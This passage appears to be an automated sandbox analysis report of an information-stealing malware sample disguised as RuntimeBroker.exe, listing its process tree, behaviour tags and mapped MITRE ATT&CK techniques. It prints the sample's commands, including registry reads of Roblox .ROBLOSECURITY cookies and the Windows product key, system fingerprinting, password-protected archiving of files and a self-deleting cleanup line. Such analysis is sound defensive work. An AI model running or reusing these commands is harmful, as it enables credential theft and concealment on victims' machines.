AeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        12⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5144
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ntaujb1a\ntaujb1a.cmdline"
        13⤵
        
        PID:5340
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "c:\Users\Admin\AppData\Local\Temp\ntaujb1a\CSC5E57E1B5C66E4001927E6FAA0408BA7.TMP"
        14⤵
        
        PID:3440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:5564
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:6004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        11⤵
        
        PID:5700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:6128
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:1396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:2532
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:4408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:5544
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:5624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        11⤵
        
        PID:5724
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        12⤵
        
        PID:5780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        11⤵
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        11⤵
        
        PID:5472
        
        C:\Windows\system32\getmac.exe
        
        getmac
        12⤵
        
        PID:5280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\N8tnD.zip" *"
        11⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\N8tnD.zip" *
        12⤵
        Executes dropped EXE
        
        PID:4728
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        11⤵
        
        PID:5268
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        11⤵
        
        PID:5776
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1408
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        11⤵
        
        PID:5220
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        11⤵
        
        PID:5800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        11⤵
        
        PID:2740
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        12⤵
        Detects videocard installed
        Suspicious behavior: EnumeratesProcesses
        
        PID:2512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        11⤵
        
        PID:5024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        12⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3588
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4728
        
        C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6084
      - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2524
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        12⤵
        Executes dropped EXE
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        13⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1308
    - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2824
      - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        6⤵
        Executes dropped EXE
        
        PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3716
    - - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3260
      - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:852
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        9⤵
        Executes dropped EXE
        
        PID:3044
- - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4172
  - - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4784
    - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:2064
      - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        6⤵
        Executes dropped EXE
        
        PID:400
- C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
  "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3356
  - - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:1092
    - - C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1368
      - C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious use of WriteProcessMemory
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_RuntimeBroker.exe"
        7⤵
        Executes dropped EXE
        
        PID:3624
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1916

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1076

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:5512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery